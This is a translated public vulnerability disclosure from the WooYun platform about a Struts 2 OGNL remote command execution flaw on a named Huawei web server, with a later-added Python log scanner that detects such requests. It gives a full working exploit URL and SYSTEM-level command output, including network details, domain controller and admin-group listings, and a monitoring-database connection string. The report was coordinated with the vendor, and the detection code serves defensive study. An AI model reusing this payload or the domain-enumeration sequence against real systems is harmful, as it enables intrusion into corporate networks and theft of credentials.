
Vulnerability summary

Defect ID: wooyun-2015-0149850

Title: A Huawei system has a remote command execution vulnerability (can penetrate the perimeter firewall into the production network)

Vendor: Huawei Technologies Co., Ltd.

Author: 猪猪侠

Submitted: 2015-10-27 15:42

Fixed: 2015-12-12 00:34

Published: 2015-12-12 00:34

Vulnerability type: command execution

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-27: Details sent to the vendor; awaiting vendor handling
2015-10-28: Vendor confirmed; details disclosed to the vendor only
2015-11-07: Details disclosed to core white hats and relevant domain experts
2015-11-17: Details disclosed to regular white hats
2015-11-27: Details disclosed to intern white hats
2015-12-12: Details disclosed to the public

Brief description:

A Huawei system has a remote command execution vulnerability (can penetrate the perimeter firewall into the production network / domain environment).
Inside the domain environment, with SYSTEM privileges, the internal network can be penetrated; the impact is large. After thinking it over for a long while, I decided to write this in Chinese after all.
Domain penetration techniques used:
http://zone.wooyun.org/content/23396

Detailed description:

#1 Vulnerable server
http://wdt-mx.huawei.com/sdtrp/project.action
http://119.145.15.78/sdtrp/project.action

Proof of vulnerability:

#2 Exploit
http://wdt-mx.huawei.com

http://119.145.15.78/sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D


D:\WEB_Server\apache-tomcat-6.0.44\webapps\sdtrp\
whoami

nt authority\system
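The proof-of-concept request above uses the "redirect:" parameter prefix, whose value older Struts 2 releases evaluated as an OGNL expression, with the whole payload percent-encoded. As an added example that is not part of the original report, the Python below approaches the same request from the defender's side: it scans web access log lines, URL-decodes each query parameter, flags any parameter that carries an "action:", "redirect:" or "redirectAction:" prefix, and escalates the verdict to "ognl-injection" when the value also contains an OGNL marker ("${" or "%{"). The log format and the sample lines are constructed for the demonstration; the second sample line reuses the report's own request.

```python
"""Flag Struts 2 prefix-parameter OGNL injection attempts in access logs.

Added example, not code from the original report. The Combined Log Format
lines in SAMPLE_LOG are constructed for the demonstration.
"""
import re
from urllib.parse import unquote, urlsplit

# Parameter-name prefixes that old Struts 2 releases handled specially and whose
# values were evaluated as OGNL before that prefix handling was removed.
PREFIXES = ("action:", "redirect:", "redirectAction:")

# OGNL expression markers, checked after URL-decoding because the payload in the
# report's request is fully percent-encoded (%24%7B is "${").
OGNL_MARKERS = ("${", "%{")

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_query(query: str) -> str:
    """Classify one raw (still percent-encoded) query string.

    Returns "ognl-injection" when a prefixed parameter carries an OGNL marker,
    "prefix-param" when a prefix is present without one, and "clean" otherwise.
    """
    verdict = "clean"
    for raw_param in query.split("&"):
        # Decode twice so a double-encoded payload is also unwrapped.
        param = unquote(unquote(raw_param))
        name = param.split("=", 1)[0].strip()
        if not name.startswith(PREFIXES):
            continue
        if any(marker in param for marker in OGNL_MARKERS):
            return "ognl-injection"
        verdict = "prefix-param"
    return verdict


def scan_access_log(lines):
    """Yield (client_ip, verdict, path) for every log line that is not clean."""
    for line in lines:
        match = _REQ_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        verdict = classify_query(parts.query)
        if verdict != "clean":
            yield line.split(" ", 1)[0], verdict, parts.path


SAMPLE_LOG = [
    # Constructed: an ordinary request to the same action.
    '203.0.113.5 - - [27/Oct/2015:16:40:01 +0800] "GET /sdtrp/project.action HTTP/1.1" 200 5123',
    # Constructed line carrying the request from the report's proof-of-concept URL.
    '203.0.113.5 - - [27/Oct/2015:16:40:09 +0800] "GET /sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D HTTP/1.1" 200 48',
    # Constructed: prefix used without an expression; worth a review but not an injection.
    '198.51.100.7 - - [27/Oct/2015:16:41:30 +0800] "GET /sdtrp/project.action?redirect:/sdtrp/login.action HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, verdict, path in scan_access_log(SAMPLE_LOG):
        print(f"{verdict:15} {ip:15} {path}")
```

Decoding before matching is the point of the check: a rule that looks for the literal "${" in the raw log would miss this request entirely, because it arrives as "%24%7B". Keeping the two verdicts separate also makes the rule usable in practice: the bare prefix deserves a look (legitimate applications rarely send it), while prefix plus marker is the signature of an exploitation attempt and warrants immediate triage of the host, which in this report was running Tomcat as SYSTEM.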


ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DGGWDTRP01-TGE
Primary Dns Suffix . . . . . . . : china.huawei.com


arp -a
Interface: 10.88.178.105 --- 0xc
Internet Address Physical Address Type
10.88.178.1 00-00-5e-00-01-b2 dynamic
10.88.178.2 f8-4a-bf-5c-1d-0e dynamic
10.88.178.3 f8-4a-bf-5c-1b-fe dynamic
10.88.178.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
Interface: 10.88.72.91 --- 0xe
Internet Address Physical Address Type
10.88.72.1 00-00-5e-00-01-48 dynamic
10.88.72.2 f8-4a-bf-5c-1d-0d dynamic
10.88.72.3 f8-4a-bf-5c-1b-fd dynamic
10.88.72.5 00-25-9e-b0-db-44 dynamic
10.88.72.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static


# Inside the domain environment, internal network penetration is possible; the impact is very large

net time /domain
Current time at \\LGGAD41-DC.china.huawei.com is 2015/10/27 16:52:34


Pinging LGGAD39-DC.china.huawei.com [10.72.135.58] with 32 bytes of data
Pinging uniportal.huawei.com [10.82.55.193] with 32 bytes of data:
Pinging mail.huawei.com [10.72.61.76] with 32 bytes of data:


Inside the domain: the domain controllers alone number in the hundreds; several hundred thousand people is no exaggeration
net group "Domain controllers" /domain

The request will be processed at a domain controller for domain china.huawei.com.
Group name Domain Controllers
Comment 域中所有域控制器
Members
-------------------------------------------------------------------------------
masked region
*****$ BLR*****
*****$ BRA*****
*****$ CGK*****
*****$ DFW*****
*****$ DGG*****
*****$ DGG*****
*****$ HGH*****
*****$ HKG*****
*****$ ISB*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LHR*****
*****$ LOS*****
*****$ MSC*****
*****$ NKG*****
*****$ NKG*****
*****$ NKG*****
*****$ NKG*****
*****$ PEK*****
*****$ RUH*****
*****$ SIA*****
*****$ SJC*****
*****$ SZX*****
*****$ SZX*****
*****$ SZX*****
*****D02-DC$ *****


YYZAD02-DC$
The command completed successfully.


The request will be processed at a domain controller for domain china.huawei.com.
Group name IT-ITPL-DC-CD-w
Comment 云数据中心安全解决方案部
Members
-------------------------------------------------------------------------------
masked region
***** d00*****
***** h00*****
***** h00*****
***** j00*****
***** l00*****
***** l00*****
***** l00*****
***** l00*****
***** o00*****
***** r90*****
***** s00*****
***** w00*****
***** w00*****
***** x00*****
***** y00*****
***** y90*****
***** z00*****
***** z00*****
*****0359515 *****


The command completed successfully.


# The final boss

The request will be processed at a domain controller for domain china.huawei.com.
User name china-admin
Full Name
Comment 管理计算机(域)的内置帐户
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2015/10/17 16:04:55
Password expires Never
Password changeable 2015/10/17 16:04:55
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *MomAdministrators
*X86-ADMIN1 *X86-ADMIN2
*X86-ADMIN3
Global Group memberships *MOMadmins *Domain Admins
*Domain Users *Group Policy Creator
The command completed successfully.


# The audit/monitoring system's database

// Script excerpt quoted in the report; only the declarations survive on the page.
// ADO connection string for the monitoring database: the SQL login and its password
// (masked here) sit in the script in cleartext.
var strADOConn="Provider=sqloledb;Data Source=szxmng02-nt.huawei.com;User ID=nt_task_monitor;Password=********;Network Library=dbmssocn";
var oADOConn,oADOCommand,oADORecord;            // ADO connection, command and recordset objects
var strServer,strTask,strStatus,strADOCommand;  // task-monitor fields and the SQL command text
var oArgs;                                      // script arguments
var iAffected;                                  // rows affected by the command


Remediation:

# Update

Copyright notice: please credit the source when reposting: 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-10-28 00:32

Vendor reply:

Thanks to 猪猪侠 for the heads-up; the business unit has been notified to fix it.

Latest status:

None yet